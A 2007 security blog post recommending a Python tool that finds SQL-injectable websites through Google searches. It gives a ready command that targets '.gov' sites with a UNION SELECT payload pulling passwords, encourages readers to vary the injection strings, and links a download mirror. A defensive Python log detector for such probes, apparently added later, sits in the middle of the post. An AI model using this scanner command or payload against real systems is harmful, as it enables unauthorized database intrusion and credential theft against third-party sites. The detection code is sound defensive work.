SQL Injection Google Scanner

I’ve just found a nice Python script, SQL Injection Google Scanner, from here. It’s not just a single-host SQL injection scanner; its task is to collect hosts that are vulnerable to SQL injection by running a Google search query. If you’re already familiar with the Remote File Inclusion Scanner by Morgan, then you should be familiar with this one, too.


Usage:

python SQLscan.py -g inurl:'.gov' 200 -s '/index.php?offset=-1/**/UNION/**/SELECT/**/1,2,concat(password)/**/FROM/**/TABLE/*' -write sql_found.txt -v

It will scan for any site that contains ‘.gov’ in its URL, and each one is then checked by injecting a SQL injection string (you could modify the strings as creatively as you like). Make sure that your box has Python installed first :P.
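Seen from the receiving web server, the probe string above shows up in the access log as a request whose query string contains UNION and SELECT separated by /**/ comments. The following is an added example, not part of the original post or of SQLscan.py, that flags such requests; the Common Log Format layout and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# UNION ... SELECT with the keywords separated by inline comments (/**/)
# or whitespace, which is how the probe string in the post is written.
SEP = r"(?:/\*.*?\*/|\s)+"
UNION_SELECT = re.compile(rf"\bunion{SEP}(?:all{SEP})?select\b", re.IGNORECASE)

# Assumption: access logs are in Common Log Format.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

# Constructed sample lines (documentation-range addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Sep/2007:10:00:01 +0000] "GET /index.php?offset=-1/**/UNION/**/SELECT/**/1,2,concat(password)/**/FROM/**/TABLE/* HTTP/1.1" 200 512',
    '192.0.2.10 - - [14/Sep/2007:10:00:02 +0000] "GET /index.php?offset=-1+union+all+select+1,2,3 HTTP/1.1" 500 87',
    '203.0.113.5 - - [14/Sep/2007:10:00:03 +0000] "GET /search?q=credit+union+hours HTTP/1.1" 200 2048',
    '198.51.100.7 - - [14/Sep/2007:10:00:04 +0000] "GET /index.php?offset=-1%252F%252A%252A%252FUNION%252F%252A%252A%252FSELECT%252F%252A%252A%252F1 HTTP/1.1" 404 0',
]

def normalize(target, max_rounds=3):
    """URL-decode repeatedly so double-encoded requests are also inspected."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target

def find_union_probes(lines):
    """Return (client, status, decoded request target) for each flagged line."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if m is None:
            continue
        client, _method, target, status = m.groups()
        decoded = normalize(target)
        if UNION_SELECT.search(decoded):
            hits.append((client, status, decoded))
    return hits

if __name__ == "__main__":
    for client, status, decoded in find_union_probes(SAMPLE_LOG):
        print(f"{client} status={status} {decoded}")
```

Keyword matching of this kind also flags harmless text such as a search for "union select committee", so treat hits as leads for review rather than confirmed injection attempts.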

To download the script, I’ve made a mirror of it, which is located here:

http://4r13-is-a.lamer.la/scrapts/SQLscan.py

Posted on September 14th, 2007 by admin in Sectools, Security

    1. stu - September 19, 2007

    Google hack rie? When will you give tips on how to hack Google? :d

    2. lain - September 19, 2007

    hahha…
    I can’t hack Google, and I will never be able to .. :P

